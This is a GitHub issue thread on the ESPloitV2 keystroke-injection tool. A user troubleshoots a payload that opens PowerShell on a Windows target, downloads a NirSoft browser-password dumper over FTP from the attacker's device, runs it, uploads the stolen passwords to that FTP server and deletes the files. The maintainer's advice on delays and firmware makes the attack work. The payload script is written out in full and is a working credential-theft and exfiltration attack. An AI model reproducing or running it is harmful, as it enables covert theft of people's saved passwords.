exploitagency/ESPloitV2 #10: Problem Scenario FTP mode

ChandraOrbit, 2017-10-05:
I have 2 scenarios whose target is not connected to internet and connected internet. ESPloit joins the target network and as an access point. FTP mode I enable
Although FTP ESPloit is in PASV mode, I assume my scenario should work.

The attacker scenario does not have an online FTP media so I upload it to an FTP folder in a small tool using ESploit with an exe extension to retrieve the cookie password ([NIRSOFT](http://www.nirsoft.net/utils/web_browser_password.html) tool with size - + 360 kb),

Payload based on example in ESPloitV2, with process order:
1. Downloading files from FTP
2. Perform executions and results stored in the data file
3. Upload the data file to FTP
4. Delete the file in the target
5. Exit

In the scenario I'm having some problems
1. Very slow download and upload process from FTP (+ - 1-2 minutes).
2. Sometimes fail / stop in PowerShell and idle console without any activity, even if the file is small.
3. If Download is successful then Upload will fail and sometimes succeed but data file is corrupted.

I use 2 machines as target (Win 7sp1 ultimate 64bit and Win 7sp1 ultimate 32bit) all without AV and standard installation. And they all get the same result.

Is there a solution or my scenario an activity not recommended in ESPloit?

This is the payload I made

> Rem:Offline Powershell download and execute file then upload
> DefaultDelay:1000
> Press:131+114
> CustomDelay:200
> PrintLine:powershell
> CustomDelay:1000
> Press:176
> CustomDelay:1000
> Rem:Download Tool from FTP Folder
> PrintLine:$ftpURI = "ftp://ftp-admin:hacktheplanet@192.168.1.1/WebPass.exe"; $webclient = New-Object -TypeName System.Net.WebClient; $ftpURI = New-Object -TypeName System.Uri -ArgumentList $ftpURI; $webclient.DownloadFile($ftpURI, [System.ENVIRONMENT]::CurrentDirectory + "\WebPass.exe"); Write-output  "Download file ... "
> CustomDelay:3000
> Rem:Execute Tool to get Webrowser Password
> PrintLine:WebPass.exe /stext pass
> CustomDelay:3000
> Rem:Uploaded execution results
> PrintLine:$ftpURI = "ftp://ftp-admin:hacktheplanet@192.168.1.1/pass"; $webclient = New-Object -TypeName System.Net.WebClient; $ftpURI = New-Object -TypeName System.Uri -ArgumentList $ftpURI; $webclient.UploadFile($ftpURI, [System.ENVIRONMENT]::CurrentDirectory + "\pass"); Write-output  "Upload file ... "
> CustomDelay:2000
> PrintLine:del WebPass.exe
> PrintLine:del pass.txt
> PrintLine:exit
> 

thank you and sorry if my english is a mess and for the stupidity i understand the performance of ESPloit but i want more advanced and very interested

exploitagency, 2017-10-05:
Exfiltrated data file sometimes appears corrupted when viewed from the web browser when it is not, click the download button under list exfiltrated data and view it that way to verify if it is indeed corrupted.

Try adding a 5 second delay before the line to download or upload, theres a lot going on under the hood sometimes it is still busy from "typing".  Turn off anything not needed like ESPortal mode and be sure your running the latest firmware.

ChandraOrbit, 2017-10-05:
The issue is resolved
- Reset to Default and install the latest firmware
- Added a few seconds to download and upload the process.
- My Wifi settings changed the channel. Because in my environment 90% use channel 6. I change to channel 1 and 12. everything works fine.

Thanks

closed 2017-10-05 by ChandraOrbit

exploitagency, 2017-10-05:
Excellent